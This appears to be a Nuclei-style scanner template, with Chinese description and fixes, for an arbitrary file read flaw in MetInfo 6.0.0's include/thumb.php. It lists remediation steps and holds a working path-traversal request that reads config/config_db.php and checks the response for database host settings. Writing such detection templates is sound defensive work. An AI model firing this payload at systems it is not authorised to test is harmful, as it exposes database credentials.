id: Metinfo-V6_0_0-FileRead
info:
  name: MetInfo6.0.0任意文件读取漏洞
  author:
  - l0ne1y
  description: |-
    MetInfo6.0.0任意文件读取漏洞
    MetInfo是一款适合企业建站的开源免费CMS建站系统，MetInfo企业网站管理系统主要用于搭建企业网站，采用PHP+Mysql架构。

    MetInfo6.0.0中 include/thumb.php页面存在任意文件读取漏洞，攻击者可利用此漏洞来获取敏感信息。
  reference:
  - https://www.freebuf.com/vuls/181698.html
  severity: high
  remediation: |-
    官方修复方案：
    1、升级系统至无漏洞版本，或于官网下载安全补丁
    https://www.mituo.cn

    临时修复方案：
    1、过滤"."，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    dsl:
    - 'status_code==200 && contains(body,"con_db_host") '
  matchers-condition: and
  path:
  - '{{BaseURL}}/include/thumb.php?dir=http\..\..\config\config_db.php'
  method: GET
